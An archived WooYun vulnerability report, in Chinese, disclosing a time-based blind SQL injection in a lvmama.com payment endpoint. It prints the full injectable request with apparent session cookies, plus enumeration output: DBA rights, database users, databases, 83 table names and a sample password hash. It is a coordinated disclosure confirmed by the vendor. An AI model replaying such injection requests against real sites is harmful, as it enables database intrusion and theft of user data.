乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-23: 厂商已经确认,细节仅向厂商公开 2015-10-03: 细节向核心白帽子及相关领域专家公开 2015-10-13: 细节向普通白帽子公开 2015-10-23: 细节向实习白帽子公开 2015-11-07: 细节向公众公开
RT
测试:
GGET /payment/pay/geexOrder.do?callback=success_jsonp&TYPE=FRONT&APP_NAME=aaaaa&APP_START_DATE=&APP_END_DATE=&LOAN_DOWNPAY_MIN=&LOAN_DOWNPAY_MAX=&OPPT_ID=&_=1442927451066 HTTP/1.1Host: pay.lvmama.comProxy-Connection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36Referer: http://www.lvmama.com/myspace/geex.doAccept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: uid=wKgKcFYBSTRiIi28AzMnAg==; lvsessionid=44abc08b-7275-498e-9ee7-395443b33064_15667285; CoreID6=37603654693514429248595&ci=90409730; vst_ebk_sessionid=f944f244-943d-49b5-a32f-e45f12ce0d3b; oUC=018115018115; oUT=08220822; CASTGC=TGC-56-fhisgT9f9AWdSkT5JywoNnSDyg1j8l60yQx3WL8TH0adoJ4YJe; unUserName=testaaaa; LSTA=781daaa8220ab30cd9fd0fd85ed6ae7b; EMV=U; UN=testaaaa%5E%21%5E4028b25b4fd5ada2014fdae694f60395; Hm_lvt_006c64491cb8acf2092ce0e0341797fe=1442926142; Hm_lpvt_006c64491cb8acf2092ce0e0341797fe=1442926142; _gscu_1059159971=42924981jf5s2210; _gscs_1059159971=42924981y2x3v110|pv:3; _gscbrs_1059159971=1; __xsptplus443=443.2.1442926066.1442926146.4%232%7Cwww.baidu.com%7C%7C%7C%7C%23%23jYwMqOfqxQhhqc_tXZ1w0zJmyc3najX9%23; __utma=30114658.550250882.1442926147.1442926147.1442926147.1; __utmb=30114658.31.10.1442926147; __utmc=30114658; __utmz=30114658.1442926147.1.1.utmcsr=login.lvmama.com|utmccn=(referral)|utmcmd=referral|utmcct=/nsso/null; bfd_s=30114658.38702051.1442924859756; tmc=43.30114658.99931619.1442924859758.1442927429127.1442927444549; tma=30114658.99931619.1442924859758.1442924859758.1442924859758.1; tmd=43.30114658.99931619.1442924859758.; bfd_g=b56c782bcb75035d0000354b00082c1e56014936; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1442924860,1442924981,1442926072; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1442927446; 90409730_clogin=v=1&l=1442924859&e=1442929248795
权限:
current user is DBA: True
用户:
database management system users [4]:[*] 'gravity'@'localhost'[*] 'root'@'127.0.0.1'[*] 'root'@'::1'[*] 'root'@'localhost'
数据库:
available databases [7]:[*] fast_log[*] geex[*] gravity[*] gravity_pre[*] information_schema[*] mysql[*] performance_schema
gravity:
[83 tables]+------------------------+| BIZ_APP01 || BIZ_APP01_FULL || BIZ_APP_CHECKLIST || BIZ_APP_COMMENTS || BIZ_APP_COMMON || BIZ_APP_COMMON_FULL || BIZ_APP_LOG || BIZ_APP_OPPT || BIZ_APP_ORDER || BIZ_APP_RECON_DTL || BIZ_APP_RECON_SUM || BIZ_APP_REJECT || BIZ_APP_STATUS || BIZ_APP_TRACK || BIZ_CAMPAIGN || BIZ_CANTACT_INFO || BIZ_DEVICE || BIZ_DFC_CONFIG || BIZ_FUNDER || BIZ_HAR_MERCHANT || BIZ_HAR_PDT || BIZ_HAR_REFUNDBANK || BIZ_HAR_REPAY || BIZ_HAR_REPAY2PDT || BIZ_HAR_REPAYPLAN || BIZ_HAR_SALES || BIZ_HAR_STORE || BIZ_HAR_STORE2PDT || BIZ_LOAN_PDT || BIZ_LOAN_PLAN || BIZ_MERCHANT || BIZ_PDT_SORT || BIZ_PREPAYMENT || BIZ_PREPAYMENT_ITEM || BIZ_RESOUCES || BIZ_RETAILS_PDT || BIZ_SHD_LIST || BIZ_STORE_ORGNZ || BIZ_TAGGING || BIZ_TAGS || BIZ_TRANSACTION_RECORD || BIZ_UNIPAY_RECORD || BIZ_V_APP_APL || BIZ_V_APP_BCF || BIZ_V_APP_BCF02 || BIZ_V_APP_BCF03 || BIZ_V_APP_BOC || BIZ_V_APP_BYR || BIZ_V_APP_GFC || BIZ_V_APP_HAR || BIZ_V_APP_QKE || CRM_ACTION_LOG || CRM_CONFIG || CRM_CONVERT || CRM_CRON_SCHEDULE || CRM_DICT || CRM_DICT2 || CRM_EMAIL_MGR || CRM_EMAIL_RAW || CRM_EMAIL_RAW_FULL || CRM_EMAIL_SENT || CRM_EMAIL_WORK || CRM_GAME_KV || CRM_RELATION || CRM_SMS_MGR || CRM_UNIQUEID_MGR || CRM_UPDOWN_MGR || CRM_USER_INFO_WECHAT || FRAUD_FACEPP_DETECTION || FRAUD_FACEPP_SIMSCORE || FRAUD_INSTINCT_INFO || FRAUD_INSTINCT_OUT || accounts || ci_sessions || dx_login_attempts || dx_permissions || dx_roles || dx_user_autologin || dx_user_profile || dx_user_temp || dx_users || migrations || pd_message |+------------------------+
dx_users里都是用户的数据 密码是做了加密 类似这样 $1$.49TxKWL$0stw8KLcghDgaaASJrVHv1但是其他信息还是可以被爆破出来的 由于是时间盲注 就不继续了
:-) 驴妈妈是个好厂商 如果我挖的足够多,它的礼物就会追上我
危害等级:高
漏洞Rank:20
确认时间:2015-09-23 10:24
谢谢!
暂无